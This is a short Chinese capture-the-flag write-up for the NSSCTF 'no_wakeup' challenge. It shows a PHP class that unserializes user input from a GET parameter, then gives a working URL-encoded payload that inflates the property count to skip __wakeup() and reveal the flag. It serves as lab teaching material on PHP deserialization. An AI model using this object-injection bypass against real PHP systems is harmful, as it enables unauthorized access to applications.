平台
在线靶场:主页 | NSSCTF
[SWPUCTF 2021 新生赛]no_wakeup
题目原型:
<?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");
class HaHaHa{
public $admin;
public $passwd;
public function __construct(){
$this->admin ="user";
$this->passwd = "123456";
}
public function __wakeup(){
$this->passwd = sha1($this->passwd);
}
public function __destruct(){
if($this->admin === "admin" && $this->passwd === "wllm"){
include("flag.php");
echo $flag;
}else{
echo $this->passwd;
echo "No wake up";
}
}
}
$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);
?>
看到中间的我我们只需要构造 admin = admin passwd = wllm就可以得到flag
那我们就要构造php反序列化
class HaHaHa{
public $admin="admin";
public $passwd="wllm";
}
$a = new HaHaHa();
echo serialize($a);
但是这题输出的既然是
很显然是错的答案,那我们试着寻找里面的哪个 __wakeup()
那我们就用 __wakeup() 绕过的姿势,只要是成员大于原来的成员都可以绕过这个函数,不会优先执行,
O:6:%22HaHaHa%22:3:{s:5:%22admin%22;s:5:%22admin%22;s:6:%22passwd%22;s:4:%22wllm%22;}
NSSCTF{97ecea61-382a-4eb5-8fbc-691eb116faec}